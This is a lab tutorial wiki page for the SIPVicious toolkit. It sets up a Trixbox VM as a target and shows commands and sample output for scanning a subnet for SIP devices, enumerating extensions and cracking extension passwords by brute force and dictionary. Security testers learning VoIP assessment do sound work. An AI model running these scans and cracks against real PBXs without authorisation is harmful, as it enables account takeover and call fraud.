#summary Running SIPVicious tools for the first time.
#labels Featured

=== this is being worked on ===

= Introduction =

This guide assumes that you're running either a Linux or a Windows box. It also assumes that you're sufficiently comfortable with the command line.

= Preparation = 

  # Get the latest VMWare Player from [http://www.vmware.com/download/player/ here]
  # Get the latest Trixbox vmware image from [http://www.trixbox.org/downloads here]

= Setting up the Victim box =

Once you have Trixbox up make sure to create a few extensions. In our lab we have extensions 100, 101 and 123. Choose a numeric password for extension "100", no password for "101" and an alphabetic password like "secret". 

= Making use of SIPVicious tools =

I'll assume that your network is on the 192.168.1 subnet from now on. Replace that with your own subnet.

First run svmap.py against your subnet to find your Asterisk box:
{{{
[you@box sipvicious]$ ./svmap 192.168.1.1/24
| SIP Device         | User Agent   |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
[you@box sipvicious]$
}}}

You should get results similar to the above. If not, make sure that you're scanning the right network.

To identify the extensions that you created previously:
{{{
[you@box sipvicious]$ ./svwar.py 192.168.1.103 
| Extension | Authentication |
------------------------------
| 123       | reqauth        |
| 100       | reqauth        |
| 101       | noauth         |
[you@box sipvicious]$
}}}

As you can see, extension 101 does not require authentication.
Finally to crack the password for 100, we just run the following command:
{{{
[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
------------------------
| 100       | 100      |
[you@box sipvicious]$
}}}

To crack an alphanumeric password we need to make use of a dictionary file. Create a dictionary file containing your password. 
{{{
[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 -d d
ictionary 
| Extension | Password |
------------------------
| 123       | test     |
[you@box sipvicious]$
}}}

Following that, you can make use of the credentials by making use of a SIP softphone such as X-lite. 

Hope that makes you happy. 

For an animated version of this check out:

[http://sipvicious.org/webcasts/sipvicious-0.2-intro/web.html SIPVicious 0.2 introduction]